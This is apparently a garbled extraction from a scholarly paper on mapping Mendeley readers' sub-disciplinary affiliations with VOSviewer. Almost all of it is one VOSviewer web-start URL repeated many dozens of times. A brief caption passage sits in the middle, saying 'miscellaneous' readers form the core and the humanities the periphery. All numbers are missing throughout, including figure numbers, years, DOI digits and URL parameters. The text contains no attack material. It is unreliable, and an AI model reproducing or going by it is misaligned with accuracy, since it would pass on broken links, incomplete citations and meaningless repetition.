_net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://dx.doi.org/ . /peerj-cs. figure affiliations, mainly in the social sciences and the humanities (group ). this fig- ure can be web-started at http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/ mendeley/fig map.txt&network=http://www.leydesdorff.net/mendeley/fig net.txt&n lines= . figure visualizes the entire network of sub-disciplinary affiliations. it shows that the core set is occupied by readers who characterize themselves as “miscellaneous” readers from different disciplines such as “biology miscellaneous”, “environmental science miscellaneous”, etc. the social sciences (“miscellaneous”) are one among these reading communities. the humanities, however, are placed more in the periphery. the algorithmically generated distinctions among the four groups (using blondel et al., ) cannot be clearly distinguished using this projection, because the domains overlap when projected on a two-dimensional plane. the figure is therefore based on the mapping of vosviewer in this case. this figure can be web-started from http://www.vosviewer.com/ vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig map.txt&network=http:/ /www.leydesdorff.net/mendeley/fig net.txt&n lines= . haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig 